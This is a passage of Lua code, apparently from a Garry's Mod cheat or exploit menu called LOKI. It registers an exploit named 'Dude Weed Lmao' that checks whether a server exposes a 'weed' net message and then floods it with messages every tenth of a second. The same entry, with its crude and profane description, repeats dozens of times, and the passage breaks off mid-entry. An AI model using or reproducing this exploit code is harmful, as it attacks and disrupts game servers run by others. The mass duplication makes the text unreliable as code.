  970. end
  971. end, },
  972. },
  973. } )
  974.  
  975. LOKI.AddExploit( "Dude Weed Lmao", {
  976. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  977. severity = 1,
  978. scan = function() return LOKI.ValidNetString( "weed" ) end,
  979. functions = {
  980. { typ = "func", name = "Big Weed", func = function()
  981. if !timer.Exists( "loki_bonghit" ) then
  982. timer.Create( "loki_bonghit", 0.1, 0, function()
  983. net.Start( "weed" )
  984. net.WriteString( "DUDE" )
  985. net.SendToServer()
  986. end)
  987. else
  988. timer.Remove( "loki_bonghit" )
  989. end
  990. end, },
  991. },
  992. } )
  993.  
  994. LOKI.AddExploit( "Dude Weed Lmao", {
  995. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  996. severity = 1,
  997. scan = function() return LOKI.ValidNetString( "weed" ) end,
  998. functions = {
  999. { typ = "func", name = "Big Weed", func = function()
  1000. if !timer.Exists( "loki_bonghit" ) then
  1001. timer.Create( "loki_bonghit", 0.1, 0, function()
  1002. net.Start( "weed" )
  1003. net.WriteString( "DUDE" )
  1004. net.SendToServer()
  1005. end)
  1006. else
  1007. timer.Remove( "loki_bonghit" )
  1008. end
  1009. end, },
  1010. },
  1011. } )
  1012.  
  1013. LOKI.AddExploit( "Dude Weed Lmao", {
  1014. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1015. severity = 1,
  1016. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1017. functions = {
  1018. { typ = "func", name = "Big Weed", func = function()
  1019. if !timer.Exists( "loki_bonghit" ) then
  1020. timer.Create( "loki_bonghit", 0.1, 0, function()
  1021. net.Start( "weed" )
  1022. net.WriteString( "DUDE" )
  1023. net.SendToServer()
  1024. end)
  1025. else
  1026. timer.Remove( "loki_bonghit" )
  1027. end
  1028. end, },
  1029. },
  1030. } )
  1031.  
  1032. LOKI.AddExploit( "Dude Weed Lmao", {
  1033. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1034. severity = 1,
  1035. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1036. functions = {
  1037. { typ = "func", name = "Big Weed", func = function()
  1038. if !timer.Exists( "loki_bonghit" ) then
  1039. timer.Create( "loki_bonghit", 0.1, 0, function()
  1040. net.Start( "weed" )
  1041. net.WriteString( "DUDE" )
  1042. net.SendToServer()
  1043. end)
  1044. else
  1045. timer.Remove( "loki_bonghit" )
  1046. end
  1047. end, },
  1048. },
  1049. } )
  1050.  
  1051. LOKI.AddExploit( "Dude Weed Lmao", {
  1052. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1053. severity = 1,
  1054. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1055. functions = {
  1056. { typ = "func", name = "Big Weed", func = function()
  1057. if !timer.Exists( "loki_bonghit" ) then
  1058. timer.Create( "loki_bonghit", 0.1, 0, function()
  1059. net.Start( "weed" )
  1060. net.WriteString( "DUDE" )
  1061. net.SendToServer()
  1062. end)
  1063. else
  1064. timer.Remove( "loki_bonghit" )
  1065. end
  1066. end, },
  1067. },
  1068. } )
  1069.  
  1070. LOKI.AddExploit( "Dude Weed Lmao", {
  1071. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1072. severity = 1,
  1073. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1074. functions = {
  1075. { typ = "func", name = "Big Weed", func = function()
  1076. if !timer.Exists( "loki_bonghit" ) then
  1077. timer.Create( "loki_bonghit", 0.1, 0, function()
  1078. net.Start( "weed" )
  1079. net.WriteString( "DUDE" )
  1080. net.SendToServer()
  1081. end)
  1082. else
  1083. timer.Remove( "loki_bonghit" )
  1084. end
  1085. end, },
  1086. },
  1087. } )
  1088.  
  1089. LOKI.AddExploit( "Dude Weed Lmao", {
  1090. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1091. severity = 1,
  1092. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1093. functions = {
  1094. { typ = "func", name = "Big Weed", func = function()
  1095. if !timer.Exists( "loki_bonghit" ) then
  1096. timer.Create( "loki_bonghit", 0.1, 0, function()
  1097. net.Start( "weed" )
  1098. net.WriteString( "DUDE" )
  1099. net.SendToServer()
  1100. end)
  1101. else
  1102. timer.Remove( "loki_bonghit" )
  1103. end
  1104. end, },
  1105. },
  1106. } )
  1107.  
  1108. LOKI.AddExploit( "Dude Weed Lmao", {
  1109. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1110. severity = 1,
  1111. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1112. functions = {
  1113. { typ = "func", name = "Big Weed", func = function()
  1114. if !timer.Exists( "loki_bonghit" ) then
  1115. timer.Create( "loki_bonghit", 0.1, 0, function()
  1116. net.Start( "weed" )
  1117. net.WriteString( "DUDE" )
  1118. net.SendToServer()
  1119. end)
  1120. else
  1121. timer.Remove( "loki_bonghit" )
  1122. end
  1123. end, },
  1124. },
  1125. } )
  1126.  
  1127. LOKI.AddExploit( "Dude Weed Lmao", {
  1128. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1129. severity = 1,
  1130. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1131. functions = {
  1132. { typ = "func", name = "Big Weed", func = function()
  1133. if !timer.Exists( "loki_bonghit" ) then
  1134. timer.Create( "loki_bonghit", 0.1, 0, function()
  1135. net.Start( "weed" )
  1136. net.WriteString( "DUDE" )
  1137. net.SendToServer()
  1138. end)
  1139. else
  1140. timer.Remove( "loki_bonghit" )
  1141. end
  1142. end, },
  1143. },
  1144. } )
  1145.  
  1146. LOKI.AddExploit( "Dude Weed Lmao", {
  1147. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1148. severity = 1,
  1149. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1150. functions = {
  1151. { typ = "func", name = "Big Weed", func = function()
  1152. if !timer.Exists( "loki_bonghit" ) then
  1153. timer.Create( "loki_bonghit", 0.1, 0, function()
  1154. net.Start( "weed" )
  1155. net.WriteString( "DUDE" )
  1156. net.SendToServer()
  1157. end)
  1158. else
  1159. timer.Remove( "loki_bonghit" )
  1160. end
  1161. end, },
  1162. },
  1163. } )
  1164.  
  1165. LOKI.AddExploit( "Dude Weed Lmao", {
  1166. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1167. severity = 1,
  1168. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1169. functions = {
  1170. { typ = "func", name = "Big Weed", func = function()
  1171. if !timer.Exists( "loki_bonghit" ) then
  1172. timer.Create( "loki_bonghit", 0.1, 0, function()
  1173. net.Start( "weed" )
  1174. net.WriteString( "DUDE" )
  1175. net.SendToServer()
  1176. end)
  1177. else
  1178. timer.Remove( "loki_bonghit" )
  1179. end
  1180. end, },
  1181. },
  1182. } )
  1183.  
  1184. LOKI.AddExploit( "Dude Weed Lmao", {
  1185. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1186. severity = 1,
  1187. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1188. functions = {
  1189. { typ = "func", name = "Big Weed", func = function()
  1190. if !timer.Exists( "loki_bonghit" ) then
  1191. timer.Create( "loki_bonghit", 0.1, 0, function()
  1192. net.Start( "weed" )
  1193. net.WriteString( "DUDE" )
  1194. net.SendToServer()
  1195. end)
  1196. else
  1197. timer.Remove( "loki_bonghit" )
  1198. end
  1199. end, },
  1200. },
  1201. } )
  1202.  
  1203. LOKI.AddExploit( "Dude Weed Lmao", {
  1204. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1205. severity = 1,
  1206. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1207. functions = {
  1208. { typ = "func", name = "Big Weed", func = function()
  1209. if !timer.Exists( "loki_bonghit" ) then
  1210. timer.Create( "loki_bonghit", 0.1, 0, function()
  1211. net.Start( "weed" )
  1212. net.WriteString( "DUDE" )
  1213. net.SendToServer()
  1214. end)
  1215. else
  1216. timer.Remove( "loki_bonghit" )
  1217. end
  1218. end, },
  1219. },
  1220. } )
  1221.  
  1222. LOKI.AddExploit( "Dude Weed Lmao", {
  1223. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1224. severity = 1,
  1225. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1226. functions = {
  1227. { typ = "func", name = "Big Weed", func = function()
  1228. if !timer.Exists( "loki_bonghit" ) then
  1229. timer.Create( "loki_bonghit", 0.1, 0, function()
  1230. net.Start( "weed" )
  1231. net.WriteString( "DUDE" )
  1232. net.SendToServer()
  1233. end)
  1234. else
  1235. timer.Remove( "loki_bonghit" )
  1236. end
  1237. end, },
  1238. },
  1239. } )
  1240.  
  1241. LOKI.AddExploit( "Dude Weed Lmao", {
  1242. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1243. severity = 1,
  1244. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1245. functions = {
  1246. { typ = "func", name = "Big Weed", func = function()
  1247. if !timer.Exists( "loki_bonghit" ) then
  1248. timer.Create( "loki_bonghit", 0.1, 0, function()
  1249. net.Start( "weed" )
  1250. net.WriteString( "DUDE" )
  1251. net.SendToServer()
  1252. end)
  1253. else
  1254. timer.Remove( "loki_bonghit" )
  1255. end
  1256. end, },
  1257. },
  1258. } )
  1259.  
  1260. LOKI.AddExploit( "Dude Weed Lmao", {
  1261. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1262. severity = 1,
  1263. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1264. functions = {
  1265. { typ = "func", name = "Big Weed", func = function()
  1266. if !timer.Exists( "loki_bonghit" ) then
  1267. timer.Create( "loki_bonghit", 0.1, 0, function()
  1268. net.Start( "weed" )
  1269. net.WriteString( "DUDE" )
  1270. net.SendToServer()
  1271. end)
  1272. else
  1273. timer.Remove( "loki_bonghit" )
  1274. end
  1275. end, },
  1276. },
  1277. } )
  1278.  
  1279. LOKI.AddExploit( "Dude Weed Lmao", {
  1280. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1281. severity = 1,
  1282. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1283. functions = {
  1284. { typ = "func", name = "Big Weed", func = function()
  1285. if !timer.Exists( "loki_bonghit" ) then
  1286. timer.Create( "loki_bonghit", 0.1, 0, function()
  1287. net.Start( "weed" )
  1288. net.WriteString( "DUDE" )
  1289. net.SendToServer()
  1290. end)
  1291. else
  1292. timer.Remove( "loki_bonghit" )
  1293. end
  1294. end, },
  1295. },
  1296. } )
  1297.  
  1298. LOKI.AddExploit( "Dude Weed Lmao", {
  1299. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1300. severity = 1,
  1301. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1302. functions = {
  1303. { typ = "func", name = "Big Weed", func = function()
  1304. if !timer.Exists( "loki_bonghit" ) then
  1305. timer.Create( "loki_bonghit", 0.1, 0, function()
  1306. net.Start( "weed" )
  1307. net.WriteString( "DUDE" )
  1308. net.SendToServer()
  1309. end)
  1310. else
  1311. timer.Remove( "loki_bonghit" )
  1312. end
  1313. end, },
  1314. },
  1315. } )
  1316.  
  1317. LOKI.AddExploit( "Dude Weed Lmao", {
  1318. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1319. severity = 1,
  1320. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1321. functions = {
  1322. { typ = "func", name = "Big Weed", func = function()
  1323. if !timer.Exists( "loki_bonghit" ) then
  1324. timer.Create( "loki_bonghit", 0.1, 0, function()
  1325. net.Start( "weed" )
  1326. net.WriteString( "DUDE" )
  1327. net.SendToServer()
  1328. end)
  1329. else
  1330. timer.Remove( "loki_bonghit" )
  1331. end
  1332. end, },
  1333. },
  1334. } )
  1335.  
  1336. LOKI.AddExploit( "Dude Weed Lmao", {
  1337. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1338. severity = 1,
  1339. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1340. functions = {
  1341. { typ = "func", name = "Big Weed", func = function()
  1342. if !timer.Exists( "loki_bonghit" ) then
  1343. timer.Create( "loki_bonghit", 0.1, 0, function()
  1344. net.Start( "weed" )
  1345. net.WriteString( "DUDE" )
  1346. net.SendToServer()
  1347. end)
  1348. else
  1349. timer.Remove( "loki_bonghit" )
  1350. end
  1351. end, },
  1352. },
  1353. } )
  1354.  
  1355. LOKI.AddExploit( "Dude Weed Lmao", {
  1356. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1357. severity = 1,
  1358. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1359. functions = {
  1360. { typ = "func", name = "Big Weed", func = function()
  1361. if !timer.Exists( "loki_bonghit" ) then
  1362. timer.Create( "loki_bonghit", 0.1, 0, function()
  1363. net.Start( "weed" )
  1364. net.WriteString( "DUDE" )
  1365. net.SendToServer()
  1366. end)
  1367. else
  1368. timer.Remove( "loki_bonghit" )
  1369. end
  1370. end, },
  1371. },
  1372. } )
  1373.  
  1374. LOKI.AddExploit( "Dude Weed Lmao", {
  1375. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1376. severity = 1,
  1377. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1378. functions = {
  1379. { typ = "func", name = "Big Weed", func = function()
  1380. if !timer.Exists( "loki_bonghit" ) then
  1381. timer.Create( "loki_bonghit", 0.1, 0, function()
  1382. net.Start( "weed" )
  1383. net.WriteString( "DUDE" )
  1384. net.SendToServer()
  1385. end)
  1386. else
  1387. timer.Remove( "loki_bonghit" )
  1388. end
  1389. end, },
  1390. },
  1391. } )
  1392.  
  1393. LOKI.AddExploit( "Dude Weed Lmao", {
  1394. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1395. severity = 1,
  1396. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1397. functions = {
  1398. { typ = "func", name = "Big Weed", func = function()
  1399. if !timer.Exists( "loki_bonghit" ) then
  1400. timer.Create( "loki_bonghit", 0.1, 0, function()
  1401. net.Start( "weed" )
  1402. net.WriteString( "DUDE" )
  1403. net.SendToServer()
  1404. end)
  1405. else
  1406. timer.Remove( "loki_bonghit" )
  1407. end
  1408. end, },
  1409. },
  1410. } )
  1411.  
  1412. LOKI.AddExploit( "Dude Weed Lmao", {
  1413. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1414. severity = 1,
  1415. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1416. functions = {
  1417. { typ = "func", name = "Big Weed", func = function()
  1418. if !timer.Exists( "loki_bonghit" ) then
  1419. timer.Create( "loki_bonghit", 0.1, 0, function()
  1420. net.Start( "weed" )
  1421. net.WriteString( "DUDE" )
  1422. net.SendToServer()
  1423. end)
  1424. else
  1425. timer.Remove( "loki_bonghit" )
  1426. end
  1427. end, },
  1428. },
  1429. } )
  1430.  
  1431. LOKI.AddExploit( "Dude Weed Lmao", {
  1432. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1433. severity = 1,
  1434. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1435. functions = {
  1436. { typ = "func", name = "Big Weed", func = function()
  1437. if !timer.Exists( "loki_bonghit" ) then
  1438. timer.Create( "loki_bonghit", 0.1, 0, function()
  1439. net.Start( "weed" )
  1440. net.WriteString( "DUDE" )
  1441. net.SendToServer()
  1442. end)
  1443. else
  1444. timer.Remove( "loki_bonghit" )
  1445. end
  1446. end, },
  1447. },
  1448. } )
  1449.  
  1450. LOKI.AddExploit( "Dude Weed Lmao", {
  1451. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1452. severity = 1,
  1453. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1454. functions = {
  1455. { typ = "func", name = "Big Weed", func = function()
  1456. if !timer.Exists( "loki_bonghit" ) then
  1457. timer.Create( "loki_bonghit", 0.1, 0, function()
  1458. net.Start( "weed" )
  1459. net.WriteString( "DUDE" )
  1460. net.SendToServer()
  1461. end)
  1462. else
  1463. timer.Remove( "loki_bonghit" )
  1464. end
  1465. end, },
  1466. },
  1467. } )
  1468.  
  1469. LOKI.AddExploit( "Dude Weed Lmao", {
  1470. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1471. severity = 1,
  1472. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1473. functions = {
  1474. { typ = "func", name = "Big Weed", func = function()
  1475. if !timer.Exists( "loki_bonghit" ) then
  1476. timer.Create( "loki_bonghit", 0.1, 0, function()
  1477. net.Start( "weed" )
  1478. net.WriteString( "DUDE" )
  1479. net.SendToServer()
  1480. end)
  1481. else
  1482. timer.Remove( "loki_bonghit" )
  1483. end
  1484. end, },
  1485. },
  1486. } )
  1487.  
  1488. LOKI.AddExploit( "Dude Weed Lmao", {
  1489. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1490. severity = 1,
  1491. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1492. functions = {
  1493. { typ = "func", name = "Big Weed", func = function()
  1494. if !timer.Exists( "loki_bonghit" ) then
  1495. timer.Create( "loki_bonghit", 0.1, 0, function()
  1496. net.Start( "weed" )
  1497. net.WriteString( "DUDE" )
  1498. net.SendToServer()
  1499. end)
  1500. else
  1501. timer.Remove( "loki_bonghit" )
  1502. end
  1503. end, },
  1504. },
  1505. } )
  1506.  
  1507. LOKI.AddExploit( "Dude Weed Lmao", {
  1508. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1509. severity = 1,
  1510. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1511. functions = {
  1512. { typ = "func", name = "Big Weed", func = function()
  1513. if !timer.Exists( "loki_bonghit" ) then
  1514. timer.Create( "loki_bonghit", 0.1, 0, function()
  1515. net.Start( "weed" )
  1516. net.WriteString( "DUDE" )
  1517. net.SendToServer()
  1518. end)
  1519. else
  1520. timer.Remove( "loki_bonghit" )
  1521. end
  1522. end, },
  1523. },
  1524. } )
  1525.  
  1526. LOKI.AddExploit( "Dude Weed Lmao", {
  1527. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1528. severity = 1,
  1529. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1530. functions = {
  1531. { typ = "func", name = "Big Weed", func = function()
  1532. if !timer.Exists( "loki_bonghit" ) then
  1533. timer.Create( "loki_bonghit", 0.1, 0, function()
  1534. net.Start( "weed" )
  1535. net.WriteString( "DUDE" )
  1536. net.SendToServer()
  1537. end)
  1538. else
  1539. timer.Remove( "loki_bonghit" )
  1540. end
  1541. end, },
  1542. },
  1543. } )
  1544.  
  1545. LOKI.AddExploit( "Dude Weed Lmao", {
  1546. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1547. severity = 1,
  1548. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1549. functions = {
  1550. { typ = "func", name = "Big Weed", func = function()
  1551. if !timer.Exists( "loki_bonghit" ) then
  1552. timer.Create( "loki_bonghit", 0.1, 0, function()
  1553. net.Start( "weed" )
  1554. net.WriteString( "DUDE" )
  1555. net.SendToServer()
  1556. end)
  1557. else
  1558. timer.Remove( "loki_bonghit" )
  1559. end
  1560. end, },
  1561. },
  1562. } )
  1563.  
  1564. LOKI.AddExploit( "Dude Weed Lmao", {
  1565. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1566. severity = 1,
  1567. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1568. functions = {
  1569. { typ = "func", name = "Big Weed", func = function()
  1570. if !timer.Exists( "loki_bonghit" ) then
  1571. timer.Create( "loki_bonghit", 0.1, 0, function()
  1572. net.Start( "weed" )
  1573. net.WriteString( "DUDE" )
  1574. net.SendToServer()
  1575. end)
  1576. else
  1577. timer.Remove( "loki_bonghit" )
  1578. end
  1579. end, },
  1580. },
  1581. } )
  1582.  
  1583. LOKI.AddExploit( "Dude Weed Lmao", {
  1584. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1585. severity = 1,
  1586. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1587. functions = {
  1588. { typ = "func", name = "Big Weed", func = function()
  1589. if !timer.Exists( "loki_bonghit" ) then
  1590. timer.Create( "loki_bonghit", 0.1, 0, function()
  1591. net.Start( "weed" )
  1592. net.WriteString( "DUDE" )
  1593. net.SendToServer()
  1594. end)
  1595. else
  1596. timer.Remove( "loki_bonghit" )
  1597. end
  1598. end, },
  1599. },
  1600. } )
  1601.  
  1602. LOKI.AddExploit( "Dude Weed Lmao", {
  1603. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1604. severity = 1,
  1605. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1606. functions = {
  1607. { typ = "func", name = "Big Weed", func = function()
  1608. if !timer.Exists( "loki_bonghit" ) then
  1609. timer.Create( "loki_bonghit", 0.1, 0, function()
  1610. net.Start( "weed" )
  1611. net.WriteString( "DUDE" )
  1612. net.SendToServer()
  1613. end)
  1614. else
  1615. timer.Remove( "loki_bonghit" )
  1616. end
  1617. end, },
  1618. },
  1619. } )
  1620.  
  1621. LOKI.AddExploit( "Dude Weed Lmao", {
  1622. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1623. severity = 1,
  1624. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1625. functions = {
  1626. { typ = "func", name = "Big Weed", func = function()
  1627. if !timer.Exists( "loki_bonghit" ) then
  1628. timer.Create( "loki_bonghit", 0.1, 0, function()
  1629. net.Start( "weed" )
  1630. net.WriteString( "DUDE" )
  1631. net.SendToServer()
  1632. end)
  1633. else
  1634. timer.Remove( "loki_bonghit" )
  1635. end
  1636. end, },
  1637. },
  1638. } )
  1639.  
  1640. LOKI.AddExploit( "Dude Weed Lmao", {
  1641. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1642. severity = 1,
  1643. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1644. functions = {
  1645. { typ = "func", name = "Big Weed", func = function()
  1646. if !timer.Exists( "loki_bonghit" ) then
  1647. timer.Create( "loki_bonghit", 0.1, 0, function()
  1648. net.Start( "weed" )
  1649. net.WriteString( "DUDE" )
  1650. net.SendToServer()
  1651. end)
  1652. else
  1653. timer.Remove( "loki_bonghit" )
  1654. end
  1655. end, },
  1656. },
  1657. } )
  1658.  
  1659. LOKI.AddExploit( "Dude Weed Lmao", {
  1660. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1661. severity = 1,
  1662. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1663. functions = {
  1664. { typ = "func", name = "Big Weed", func = function()
  1665. if !timer.Exists( "loki_bonghit" ) then
  1666. timer.Create( "loki_bonghit", 0.1, 0, function()
  1667. net.Start( "weed" )
  1668. net.WriteString( "DUDE" )
  1669. net.SendToServer()
  1670. end)
  1671. else
  1672. timer.Remove( "loki_bonghit" )
  1673. end
  1674. end, },
  1675. },
  1676. } )
  1677.  
  1678. LOKI.AddExploit( "Dude Weed Lmao", {
  1679. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1680. severity = 1,
  1681. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1682. functions = {
  1683. { typ = "func", name = "Big Weed", func = function()
  1684. if !timer.Exists( "loki_bonghit" ) then
  1685. timer.Create( "loki_bonghit", 0.1, 0, function()
  1686. net.Start( "weed" )
  1687. net.WriteString( "DUDE" )
  1688. net.SendToServer()
  1689. end)
  1690. else
  1691. timer.Remove( "loki_bonghit" )
  1692. end
  1693. end, },
  1694. },
  1695. } )
  1696.  
  1697. LOKI.AddExploit( "Dude Weed Lmao", {
  1698. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1699. severity = 1,
  1700. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1701. functions = {
  1702. { typ = "func", name = "Big Weed", func = function()
  1703. if !timer.Exists( "loki_bonghit" ) then
  1704. timer.Create( "loki_bonghit", 0.1, 0, function()
  1705. net.Start( "weed" )
  1706. net.WriteString( "DUDE" )
  1707. net.SendToServer()
  1708. end)
  1709. else
  1710. timer.Remove( "loki_bonghit" )
  1711. end
  1712. end, },
  1713. },
  1714. } )
  1715.  
  1716. LOKI.AddExploit( "Dude Weed Lmao", {
  1717. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1718. severity = 1,
  1719. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1720. functions = {
  1721. { typ = "func", name = "Big Weed", func = function()
  1722. if !timer.Exists( "loki_bonghit" ) then
  1723. timer.Create( "loki_bonghit", 0.1, 0, function()
  1724. net.Start( "weed" )
  1725. net.WriteString( "DUDE" )
  1726. net.SendToServer()
  1727. end)
  1728. else
  1729. timer.Remove( "loki_bonghit" )
  1730. end
  1731. end, },
  1732. },
  1733. } )
  1734.  
  1735. LOKI.AddExploit( "Dude Weed Lmao", {
  1736. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1737. severity = 1,
  1738. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1739. functions = {
  1740. { typ = "func", name = "Big Weed", func = function()
  1741. if !timer.Exists( "loki_bonghit" ) then
  1742. timer.Create( "loki_bonghit", 0.1, 0, function()
  1743. net.Start( "weed" )
  1744. net.WriteString( "DUDE" )
  1745. net.SendToServer()
  1746. end)
  1747. else
  1748. timer.Remove( "loki_bonghit" )
  1749. end
  1750. end, },
  1751. },
  1752. } )
  1753.  
  1754. LOKI.AddExploit( "Dude Weed Lmao", {
  1755. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1756. severity = 1,
  1757. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1758. functions = {
  1759. { typ = "func", name = "Big Weed", func = function()
  1760. if !timer.Exists( "loki_bonghit" ) then
  1761. timer.Create( "loki_bonghit", 0.1, 0, function()
  1762. net.Start( "weed" )
  1763. net.WriteString( "DUDE" )
  1764. net.SendToServer()
  1765. end)
  1766. else
  1767. timer.Remove( "loki_bonghit" )
  1768. end
  1769. end, },
  1770. },
  1771. } )
  1772.  
  1773. LOKI.AddExploit( "Dude Weed Lmao", {
  1774. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1775. severity = 1,
  1776. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1777. functions = {
  1778. { typ = "func", name = "Big Weed", func = function()
  1779. if !timer.Exists( "loki_bonghit" ) then
  1780. timer.Create( "loki_bonghit", 0.1, 0, function()
  1781. net.Start( "weed" )
  1782. net.WriteString( "DUDE" )
  1783. net.SendToServer()
  1784. end)
  1785. else
  1786. timer.Remove( "loki_bonghit" )
  1787. end
  1788. end, },
  1789. },
  1790. } )
  1791.  
  1792. LOKI.AddExploit( "Dude Weed Lmao", {
  1793. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1794. severity = 1,
  1795. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1796. functions = {
  1797. { typ = "func", name = "Big Weed", func = function()
  1798. if !timer.Exists( "loki_bonghit" ) then
  1799. timer.Create( "loki_bonghit", 0.1, 0, function()
  1800. net.Start( "weed" )
  1801. net.WriteString( "DUDE" )
  1802. net.SendToServer()
  1803. end)
  1804. else
  1805. timer.Remove( "loki_bonghit" )
  1806. end
  1807. end, },
  1808. },
  1809. } )
  1810.  
  1811. LOKI.AddExploit( "Dude Weed Lmao", {
  1812. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1813. severity = 1,
  1814. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1815. functions = {
  1816. { typ = "func", name = "Big Weed", func = function()
  1817. if !timer.Exists( "loki_bonghit" ) then
  1818. timer.Create( "loki_bonghit", 0.1, 0, function()
  1819. net.Start( "weed" )
  1820. net.WriteString( "DUDE" )
  1821. net.SendToServer()
  1822. end)
  1823. else
  1824. timer.Remove( "loki_bonghit" )
  1825. end
  1826. end, },
  1827. },
  1828. } )
  1829.  
  1830. LOKI.AddExploit( "Dude Weed Lmao", {
  1831. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1832. severity = 1,
  1833. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1834. functions = {
  1835. { typ = "func", name = "Big Weed", func = function()
  1836. if !timer.Exists( "loki_bonghit" ) then
  1837. timer.Create( "loki_bonghit", 0.1, 0, function()
  1838. net.Start( "weed" )
  1839. net.WriteString( "DUDE" )
  1840. net.SendToServer()
  1841. end)
  1842. else
  1843. timer.Remove( "loki_bonghit" )
  1844. end
  1845. end, },
  1846. },
  1847. } )
  1848.  
  1849. LOKI.AddExploit( "Dude Weed Lmao", {
  1850. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1851. severity = 1,
  1852. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1853. functions = {
  1854. { typ = "func", name = "Big Weed", func = function()
  1855. if !timer.Exists( "loki_bonghit" ) then
  1856. timer.Create( "loki_bonghit", 0.1, 0, function()
  1857. net.Start( "weed" )
  1858. net.WriteString( "DUDE" )
  1859. net.SendToServer()
  1860. end)
  1861. else
  1862. timer.Remove( "loki_bonghit" )
  1863. end
  1864. end, },
  1865. },
  1866. } )
  1867.  
  1868. LOKI.AddExploit( "Dude Weed Lmao", {
  1869. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1870. severity = 1,
  1871. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1872. functions = {
  1873. { typ = "func", name = "Big Weed", func = function()
  1874. if !timer.Exists( "loki_bonghit" ) then
  1875. timer.Create( "loki_bonghit", 0.1, 0, function()
  1876. net.Start( "weed" )
  1877. net.WriteString( "DUDE" )
  1878. net.SendToServer()
  1879. end)
  1880. else
  1881. timer.Remove( "loki_bonghit" )
  1882. end
  1883. end, },
  1884. },
  1885. } )
  1886.  
  1887. LOKI.AddExploit( "Dude Weed Lmao", {
  1888. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  1889. severity = 1,
  1890. scan = function() return LOKI.ValidNetString( "weed" ) end,
  1891. functions = {
  1892. { typ = "func", name = "Big Weed", func = function()
  1893. if !timer.Exists( "loki_bonghit" ) then
  1894. timer.Create( "loki_bonghit", 0.1, 0, function()
  1895. net.Start( "weed" )
